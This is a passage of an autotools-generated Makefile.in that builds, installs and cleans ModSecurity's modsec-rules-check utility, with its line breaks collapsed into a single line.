$(AM_CXXFLAGS) $(CXXFLAGS) $(modsec_rules_check_LDFLAGS) \ $(LDFLAGS) -o $@ AM_V_P = $(am__v_P_@AM_V@) am__v_P_ = $(am__v_P_@AM_DEFAULT_V@) am__v_P_0 = false am__v_P_1 = : AM_V_GEN = $(am__v_GEN_@AM_V@) am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@) am__v_GEN_0 = @echo " GEN " $@; am__v_GEN_1 = AM_V_at = $(am__v_at_@AM_V@) am__v_at_ = $(am__v_at_@AM_DEFAULT_V@) am__v_at_0 = @ am__v_at_1 = DEFAULT_INCLUDES = -I.@am__isrc@ -I$(top_builddir)/src depcomp = $(SHELL) $(top_srcdir)/depcomp am__maybe_remake_depfiles = depfiles am__depfiles_remade = ./$(DEPDIR)/modsec_rules_check-rules-check.Po am__mv = mv -f CXXCOMPILE = $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) \ $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) LTCXXCOMPILE = $(LIBTOOL) $(AM_V_lt) --tag=CXX $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=compile $(CXX) $(DEFS) \ $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) \ $(AM_CXXFLAGS) $(CXXFLAGS) AM_V_CXX = $(am__v_CXX_@AM_V@) am__v_CXX_ = $(am__v_CXX_@AM_DEFAULT_V@) am__v_CXX_0 = @echo " CXX " $@; am__v_CXX_1 = CXXLD = $(CXX) CXXLINK = $(LIBTOOL) $(AM_V_lt) --tag=CXX $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=link $(CXXLD) $(AM_CXXFLAGS) \ $(CXXFLAGS) $(AM_LDFLAGS) $(LDFLAGS) -o $@ AM_V_CXXLD = $(am__v_CXXLD_@AM_V@) am__v_CXXLD_ = $(am__v_CXXLD_@AM_DEFAULT_V@) am__v_CXXLD_0 = @echo " CXXLD " $@; am__v_CXXLD_1 = SOURCES = $(modsec_rules_check_SOURCES) DIST_SOURCES = $(modsec_rules_check_SOURCES) am__can_run_installinfo = \ case $$AM_UPDATE_INFO_DIR in \ n|no|NO) false;; \ *) (install-info --version) >/dev/null 2>&1;; \ esac am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP) # Read a list of newline-separated strings from the standard input, # and print each of them once, without duplicates. Input order is # *not* preserved. am__uniquify_input = $(AWK) '\ BEGIN { nonempty = 0; } \ { items[$$0] = 1; nonempty = 1; } \ END { if (nonempty) { for (i in items) print i; }; } \ ' # Make sure the list of sources is unique. This is necessary because, # e.g., the same source file might be shared among _SOURCES variables # for different programs/libraries. am__define_uniq_tagged_files = \ list='$(am__tagged_files)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | $(am__uniquify_input)` ETAGS = etags CTAGS = ctags am__DIST_COMMON = $(srcdir)/Makefile.in $(top_srcdir)/depcomp DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) ACLOCAL = @ACLOCAL@ AMTAR = @AMTAR@ AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@ AR = @AR@ AUTOCONF = @AUTOCONF@ AUTOHEADER = @AUTOHEADER@ AUTOMAKE = @AUTOMAKE@ AWK = @AWK@ BISON = @BISON@ CC = @CC@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ CURL_CFLAGS = @CURL_CFLAGS@ CURL_CONFIG = @CURL_CONFIG@ CURL_CPPFLAGS = @CURL_CPPFLAGS@ CURL_DISPLAY = @CURL_DISPLAY@ CURL_FOUND = @CURL_FOUND@ CURL_LDADD = @CURL_LDADD@ CURL_LDFLAGS = @CURL_LDFLAGS@ CURL_USES_GNUTLS = @CURL_USES_GNUTLS@ CURL_VERSION = @CURL_VERSION@ CXX = @CXX@ CXXCPP = @CXXCPP@ CXXDEPMODE = @CXXDEPMODE@ CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ DLLTOOL = @DLLTOOL@ DOXYGEN_PAPER_SIZE = @DOXYGEN_PAPER_SIZE@ DSYMUTIL = @DSYMUTIL@ DUMPBIN = @DUMPBIN@ DX_CONFIG = @DX_CONFIG@ DX_DOCDIR = @DX_DOCDIR@ DX_DOT = @DX_DOT@ DX_DOXYGEN = @DX_DOXYGEN@ DX_DVIPS = @DX_DVIPS@ DX_EGREP = @DX_EGREP@ DX_ENV = @DX_ENV@ DX_FLAG_chi = @DX_FLAG_chi@ DX_FLAG_chm = @DX_FLAG_chm@ DX_FLAG_doc = @DX_FLAG_doc@ DX_FLAG_dot = @DX_FLAG_dot@ DX_FLAG_html = @DX_FLAG_html@ DX_FLAG_man = @DX_FLAG_man@ DX_FLAG_pdf = @DX_FLAG_pdf@ DX_FLAG_ps = @DX_FLAG_ps@ DX_FLAG_rtf = @DX_FLAG_rtf@ DX_FLAG_xml = @DX_FLAG_xml@ DX_HHC = @DX_HHC@ DX_LATEX = @DX_LATEX@ DX_MAKEINDEX = @DX_MAKEINDEX@ DX_PDFLATEX = @DX_PDFLATEX@ DX_PERL = @DX_PERL@ DX_PROJECT = @DX_PROJECT@ ECHO_C = @ECHO_C@ ECHO_N = @ECHO_N@ ECHO_T = @ECHO_T@ EGREP = @EGREP@ ENABLE_VALGRIND_drd = @ENABLE_VALGRIND_drd@ ENABLE_VALGRIND_helgrind = @ENABLE_VALGRIND_helgrind@ ENABLE_VALGRIND_memcheck = @ENABLE_VALGRIND_memcheck@ ENABLE_VALGRIND_sgcheck = @ENABLE_VALGRIND_sgcheck@ EXEEXT = @EXEEXT@ FGREP = @FGREP@ FLEX = @FLEX@ GEOIP_CFLAGS = @GEOIP_CFLAGS@ GEOIP_DISPLAY = @GEOIP_DISPLAY@ GEOIP_FOUND = @GEOIP_FOUND@ GEOIP_LDADD = @GEOIP_LDADD@ GEOIP_LDFLAGS = @GEOIP_LDFLAGS@ GEOIP_LIBS = @GEOIP_LIBS@ GEOIP_VERSION = @GEOIP_VERSION@ GLOBAL_CFLAGS = @GLOBAL_CFLAGS@ GLOBAL_CPPFLAGS = @GLOBAL_CPPFLAGS@ GLOBAL_LDADD = @GLOBAL_LDADD@ GREP = @GREP@ INSTALL = @INSTALL@ INSTALL_DATA = @INSTALL_DATA@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_SCRIPT = @INSTALL_SCRIPT@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ LEX = @LEX@ LEXLIB = @LEXLIB@ LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ LIBXML2_CFLAGS = @LIBXML2_CFLAGS@ LIBXML2_CONFIG = @LIBXML2_CONFIG@ LIBXML2_CPPFLAGS = @LIBXML2_CPPFLAGS@ LIBXML2_DISPLAY = @LIBXML2_DISPLAY@ LIBXML2_FOUND = @LIBXML2_FOUND@ LIBXML2_LDADD = @LIBXML2_LDADD@ LIBXML2_LDFLAGS = @LIBXML2_LDFLAGS@ LIBXML2_VERSION = @LIBXML2_VERSION@ LIPO = @LIPO@ LMDB_CFLAGS = @LMDB_CFLAGS@ LMDB_DISPLAY = @LMDB_DISPLAY@ LMDB_FOUND = @LMDB_FOUND@ LMDB_LDADD = @LMDB_LDADD@ LMDB_LDFLAGS = @LMDB_LDFLAGS@ LMDB_LIBS = @LMDB_LIBS@ LMDB_VERSION = @LMDB_VERSION@ LN_S = @LN_S@ LTLIBOBJS = @LTLIBOBJS@ LT_SYS_LIBRARY_PATH = @LT_SYS_LIBRARY_PATH@ LUA_CFLAGS = @LUA_CFLAGS@ LUA_DISPLAY = @LUA_DISPLAY@ LUA_FOUND = @LUA_FOUND@ LUA_LDADD = @LUA_LDADD@ LUA_LDFLAGS = @LUA_LDFLAGS@ MAKEINFO = @MAKEINFO@ MANIFEST_TOOL = @MANIFEST_TOOL@ MAXMIND_CFLAGS = @MAXMIND_CFLAGS@ MAXMIND_DISPLAY = @MAXMIND_DISPLAY@ MAXMIND_FOUND = @MAXMIND_FOUND@ MAXMIND_LDADD = @MAXMIND_LDADD@ MAXMIND_LDFLAGS = @MAXMIND_LDFLAGS@ MAXMIND_LIBS = @MAXMIND_LIBS@ MAXMIND_VERSION = @MAXMIND_VERSION@ MKDIR_P = @MKDIR_P@ MODSEC_MUTEX_ON_PM = @MODSEC_MUTEX_ON_PM@ MODSEC_NO_LOGS = @MODSEC_NO_LOGS@ MSC_BASE_DIR = @MSC_BASE_DIR@ MSC_GIT_VERSION = @MSC_GIT_VERSION@ MSC_VERSION = @MSC_VERSION@ MSC_VERSION_INFO = @MSC_VERSION_INFO@ MSC_VERSION_WITH_PATCHLEVEL = @MSC_VERSION_WITH_PATCHLEVEL@ NM = @NM@ NMEDIT = @NMEDIT@ OBJDUMP = @OBJDUMP@ OBJEXT = @OBJEXT@ OTOOL = @OTOOL@ OTOOL64 = @OTOOL64@ PACKAGE = @PACKAGE@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ PCRE_CFLAGS = @PCRE_CFLAGS@ PCRE_CONFIG = @PCRE_CONFIG@ PCRE_CPPFLAGS = @PCRE_CPPFLAGS@ PCRE_LDADD = @PCRE_LDADD@ PCRE_LDFLAGS = @PCRE_LDFLAGS@ PCRE_LD_PATH = @PCRE_LD_PATH@ PCRE_VERSION = @PCRE_VERSION@ PKG_CONFIG = @PKG_CONFIG@ PKG_CONFIG_LIBDIR = @PKG_CONFIG_LIBDIR@ PKG_CONFIG_PATH = @PKG_CONFIG_PATH@ RANLIB = @RANLIB@ SED = @SED@ SET_MAKE = @SET_MAKE@ SHELL = @SHELL@ SSDEEP_CFLAGS = @SSDEEP_CFLAGS@ SSDEEP_DISPLAY = @SSDEEP_DISPLAY@ SSDEEP_FOUND = @SSDEEP_FOUND@ SSDEEP_LDADD = @SSDEEP_LDADD@ SSDEEP_LDFLAGS = @SSDEEP_LDFLAGS@ STRIP = @STRIP@ VALGRIND = @VALGRIND@ VALGRIND_ENABLED = @VALGRIND_ENABLED@ VERSION = @VERSION@ YACC = @YACC@ YACC_INST = @YACC_INST@ YAJL_CFLAGS = @YAJL_CFLAGS@ YAJL_DISPLAY = @YAJL_DISPLAY@ YAJL_FOUND = @YAJL_FOUND@ YAJL_LDADD = @YAJL_LDADD@ YAJL_LDFLAGS = @YAJL_LDFLAGS@ YAJL_LIBS = @YAJL_LIBS@ YAJL_VERSION = @YAJL_VERSION@ YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_AR = @ac_ct_AR@ ac_ct_CC = @ac_ct_CC@ ac_ct_CXX = @ac_ct_CXX@ ac_ct_DUMPBIN = @ac_ct_DUMPBIN@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ am__tar = @am__tar@ am__untar = @am__untar@ bindir = @bindir@ build = @build@ build_alias = @build_alias@ build_cpu = @build_cpu@ build_os = @build_os@ build_vendor = @build_vendor@ builddir = @builddir@ datadir = @datadir@ datarootdir = @datarootdir@ docdir = @docdir@ dvidir = @dvidir@ exec_prefix = @exec_prefix@ host = @host@ host_alias = @host_alias@ host_cpu = @host_cpu@ host_os = @host_os@ host_vendor = @host_vendor@ htmldir = @htmldir@ includedir = @includedir@ infodir = @infodir@ install_sh = @install_sh@ libdir = @libdir@ libexecdir = @libexecdir@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ program_transform_name = @program_transform_name@ psdir = @psdir@ sbindir = @sbindir@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ valgrind_enabled_tools = @valgrind_enabled_tools@ valgrind_tools = @valgrind_tools@ modsec_rules_check_SOURCES = \ rules-check.cc modsec_rules_check_LDADD = \ $(top_builddir)/src/.libs/libmodsecurity.la \ $(CURL_LDADD) \ $(GEOIP_LDADD) \ $(MAXMIND_LDADD) \ $(GLOBAL_LDADD) \ $(LIBXML2_LDADD) \ $(LMDB_LDADD) \ $(LUA_LDADD) \ $(PCRE_LDADD) \ $(SSDEEP_LDADD) \ $(YAJL_LDADD) modsec_rules_check_LDFLAGS = \ $(GEOIP_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(LDFLAGS) \ $(LMDB_LDFLAGS) \ $(LUA_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(YAJL_LDFLAGS) modsec_rules_check_CPPFLAGS = \ -std=c++11 \ -I$(top_builddir)/headers \ $(GLOBAL_CPPFLAGS) \ $(PCRE_CFLAGS) \ $(LMDB_CFLAGS) \ $(MAXMIND_CFLAGS) \ $(LIBXML2_CFLAGS) MAINTAINERCLEANFILES = \ Makefile.in all: all-am .SUFFIXES: .SUFFIXES: .cc .lo .o .obj $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign tools/rules-check/Makefile'; \ $(am__cd) $(top_srcdir) && \ $(AUTOMAKE) --foreign tools/rules-check/Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ *config.status*) \ cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \ *) \ echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles)'; \ cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles);; \ esac; $(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(am__aclocal_m4_deps): install-binPROGRAMS: $(bin_PROGRAMS) @$(NORMAL_INSTALL) @list='$(bin_PROGRAMS)'; test -n "$(bindir)" || list=; \ if test -n "$$list"; then \ echo " $(MKDIR_P) '$(DESTDIR)$(bindir)'"; \ $(MKDIR_P) "$(DESTDIR)$(bindir)" || exit 1; \ fi; \ for p in $$list; do echo "$$p $$p"; done | \ sed 's/$(EXEEXT)$$//' | \ while read p p1; do if test -f $$p \ || test -f $$p1 \ ; then echo "$$p"; echo "$$p"; else :; fi; \ done | \ sed -e 'p;s,.*/,,;n;h' \ -e 's|.*|.|' \ -e 'p;x;s,.*/,,;s/$(EXEEXT)$$//;$(transform);s/$$/$(EXEEXT)/' | \ sed 'N;N;N;s,\n, ,g' | \ $(AWK) 'BEGIN { files["."] = ""; dirs["."] = 1 } \ { d=$$3; if (dirs[d] != 1) { print "d", d; dirs[d] = 1 } \ if ($$2 == $$4) files[d] = files[d] " " $$1; \ else { print "f", $$3 "/" $$4, $$1; } } \ END { for (d in files) print "f", d, files[d] }' | \ while read type dir files; do \ if test "$$dir" = .; then dir=; else dir=/$$dir; fi; \ test -z "$$files" || { \ echo " $(INSTALL_PROGRAM_ENV) $(LIBTOOL) $(AM_LIBTOOLFLAGS) $(LIBTOOLFLAGS) --mode=install $(INSTALL_PROGRAM) $$files '$(DESTDIR)$(bindir)$$dir'"; \ $(INSTALL_PROGRAM_ENV) $(LIBTOOL) $(AM_LIBTOOLFLAGS) $(LIBTOOLFLAGS) --mode=install $(INSTALL_PROGRAM) $$files "$(DESTDIR)$(bindir)$$dir" || exit $$?; \ } \ ; done uninstall-binPROGRAMS: @$(NORMAL_UNINSTALL) @list='$(bin_PROGRAMS)'; test -n "$(bindir)" || list=; \ files=`for p in $$list; do echo "$$p"; done | \ sed -e 'h;s,^.*/,,;s/$(EXEEXT)$$//;$(transform)' \ -e 's/$$/$(EXEEXT)/' \ `; \ test -n "$$list" || exit 0; \ echo " ( cd '$(DESTDIR)$(bindir)' && rm -f" $$files ")"; \ cd "$(DESTDIR)$(bindir)" && rm -f $$files clean-binPROGRAMS: @list='$(bin_PROGRAMS)'; test -n "$$list" || exit 0; \ echo " rm -f" $$list; \ rm -f $$list || exit $$?; \ test -n "$(EXEEXT)" || exit 0; \ list=`for p in $$list; do echo "$$p"; done | sed 's/$(EXEEXT)$$//'`; \ echo " rm -f" $$list; \ rm -f $$list modsec-rules-check$(EXEEXT): $(modsec_rules_check_OBJECTS) $(modsec_rules_check_DEPENDENCIES) $(EXTRA_modsec_rules_check_DEPENDENCIES) @rm -f modsec-rules-check$(EXEEXT) $(AM_V_CXXLD)$(modsec_rules_check_LINK) $(modsec_rules_check_OBJECTS) $(modsec_rules_check_LDADD) $(LIBS) mostlyclean-compile: -rm -f *.$(OBJEXT) distclean-compile: -rm -f *.tab.c @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/modsec_rules_check-rules-check.Po@am__quote@ # am--include-marker $(am__depfiles_remade): @$(MKDIR_P) $(@D) @echo '# dummy' >$@-t && $(am__mv) $@-t $@ am--depfiles: $(am__depfiles_remade) .cc.o: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.o$$||'`;\ @am__fastdepCXX_TRUE@ $(CXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXXCOMPILE) -c -o $@ $< .cc.obj: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.obj$$||'`;\ @am__fastdepCXX_TRUE@ $(CXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ `$(CYGPATH_W) '$<'` &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXXCOMPILE) -c -o $@ `$(CYGPATH_W) '$<'` .cc.lo: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.lo$$||'`;\ @am__fastdepCXX_TRUE@ $(LTCXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Plo @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=yes @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(LTCXXCOMPILE) -c -o $@ $< modsec_rules_check-rules-check.o: rules-check.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(modsec_rules_check_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT modsec_rules_check-rules-check.o -MD -MP -MF $(DEPDIR)/modsec_rules_check-rules-check.Tpo -c -o modsec_rules_check-rules-check.o `test -f 'rules-check.cc' || echo '$(srcdir)/'`rules-check.cc @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) $(DEPDIR)/modsec_rules_check-rules-check.Tpo $(DEPDIR)/modsec_rules_check-rules-check.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='rules-check.cc' object='modsec_rules_check-rules-check.o' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(modsec_rules_check_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o modsec_rules_check-rules-check.o `test -f 'rules-check.cc' || echo '$(srcdir)/'`rules-check.cc modsec_rules_check-rules-check.obj: rules-check.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(modsec_rules_check_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT modsec_rules_check-rules-check.obj -MD -MP -MF $(DEPDIR)/modsec_rules_check-rules-check.Tpo -c -o modsec_rules_check-rules-check.obj `if test -f 'rules-check.cc'; then $(CYGPATH_W) 'rules-check.cc'; else $(CYGPATH_W) '$(srcdir)/rules-check.cc'; fi` @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) $(DEPDIR)/modsec_rules_check-rules-check.Tpo $(DEPDIR)/modsec_rules_check-rules-check.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='rules-check.cc' object='modsec_rules_check-rules-check.obj' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(modsec_rules_check_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o modsec_rules_check-rules-check.obj `if test -f 'rules-check.cc'; then $(CYGPATH_W) 'rules-check.cc'; else $(CYGPATH_W) '$(srcdir)/rules-check.cc'; fi` mostlyclean-libtool: -rm -f *.lo clean-libtool: -rm -rf .libs _libs ID: $(am__tagged_files) $(am__define_uniq_tagged_files); mkid -fID $$unique tags: tags-am TAGS: tags tags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) set x; \ here=`pwd`; \ $(am__define_uniq_tagged_files); \ shift; \ if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \ test -n "$$unique" || unique=$$empty_fix; \ if test $$# -gt 0; then \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ "$$@" $$unique; \ else \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ $$unique; \ fi; \ fi ctags: ctags-am CTAGS: ctags ctags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) $(am__define_uniq_tagged_files); \ test -z "$(CTAGS_ARGS)$$unique" \ || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \ $$unique GTAGS: here=`$(am__cd) $(top_builddir) && pwd` \ && $(am__cd) $(top_srcdir) \ && gtags -i $(GTAGS_ARGS) "$$here" cscopelist: cscopelist-am cscopelist-am: $(am__tagged_files) list='$(am__tagged_files)'; \ case "$(srcdir)" in \ [\\/]* | ?:[\\/]*) sdir="$(srcdir)" ;; \ *) sdir=$(subdir)/$(srcdir) ;; \ esac; \ for i in $$list; do \ if test -f "$$i"; then \ echo "$(subdir)/$$i"; \ else \ echo "$$sdir/$$i"; \ fi; \ done >> $(top_builddir)/cscope.files distclean-tags: -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags distdir: $(BUILT_SOURCES) $(MAKE) $(AM_MAKEFLAGS) distdir-am distdir-am: $(DISTFILES) @srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ list='$(DISTFILES)'; \ dist_files=`for file in $$list; do echo $$file; done | \ sed -e "s|^$$srcdirstrip/||;t" \ -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \ case $$dist_files in \ */*) $(MKDIR_P) `echo "$$dist_files" | \ sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \ sort -u` ;; \ esac; \ for file in $$dist_files; do \ if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ if test -d "$(distdir)/$$file"; then \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ test -f "$(distdir)/$$file" \ || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done check-am: all-am check: check-am all-am: Makefile $(PROGRAMS) installdirs: for dir in "$(DESTDIR)$(bindir)"; do \ test -z "$$dir" || $(MKDIR_P) "$$dir"; \ done install: install-am install-exec: install-exec-am install-data: install-data-am uninstall: uninstall-am install-am: all-am @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am installcheck: installcheck-am install-strip: if test -z '$(STRIP)'; then \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ install; \ else \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \ fi mostlyclean-generic: clean-generic: distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @echo "it deletes files that may require special tools to rebuild." -test -z "$(MAINTAINERCLEANFILES)" || rm -f $(MAINTAINERCLEANFILES) clean: clean-am clean-am: clean-binPROGRAMS clean-generic clean-libtool mostlyclean-am distclean: distclean-am -rm -f ./$(DEPDIR)/modsec_rules_check-rules-check.Po -rm -f Makefile distclean-am: clean-am distclean-compile distclean-generic \ distclean-tags dvi: dvi-am dvi-am: html: html-am html-am: info: info-am info-am: install-data-am: install-dvi: install-dvi-am install-dvi-am: install-exec-am: install-binPROGRAMS install-html: install-html-am install-html-am: install-info: install-info-am install-info-am: install-man: install-pdf: install-pdf-am install-pdf-am: install-ps: install-ps-am install-ps-am: installcheck-am: maintainer-clean: maintainer-clean-am -rm -f ./$(DEPDIR)/modsec_rules_check-rules-check.Po -rm -f Makefile maintainer-clean-am: distclean-am maintainer-clean-generic mostlyclean: mostlyclean-am mostlyclean-am: mostlyclean-compile mostlyclean-generic \ mostlyclean-libtool pdf: pdf-am pdf-am: ps: ps-am ps-am: uninstall-am: uninstall-binPROGRAMS .MAKE: install-am install-strip .PHONY: CTAGS GTAGS TAGS all all-am am--depfiles check check-am clean \ clean-binPROGRAMS clean-generic clean-libtool cscopelist-am \ ctags ctags-am distclean distclean-compile distclean-generic \ distclean-libtool distclean-tags distdir dvi dvi-am html \ html-am info info-am install install-am install-binPROGRAMS \ install-data install-data-am install-dvi install-dvi-am \ install-exec install-exec-am install-html install-html-am \ install-info install-info-am install-man install-pdf \ install-pdf-am install-ps install-ps-am install-strip \ installcheck installcheck-am installdirs maintainer-clean \ maintainer-clean-generic mostlyclean mostlyclean-compile \ mostlyclean-generic mostlyclean-libtool pdf pdf-am ps ps-am \ tags tags-am uninstall uninstall-am uninstall-binPROGRAMS .PRECIOUS: Makefile # Tell 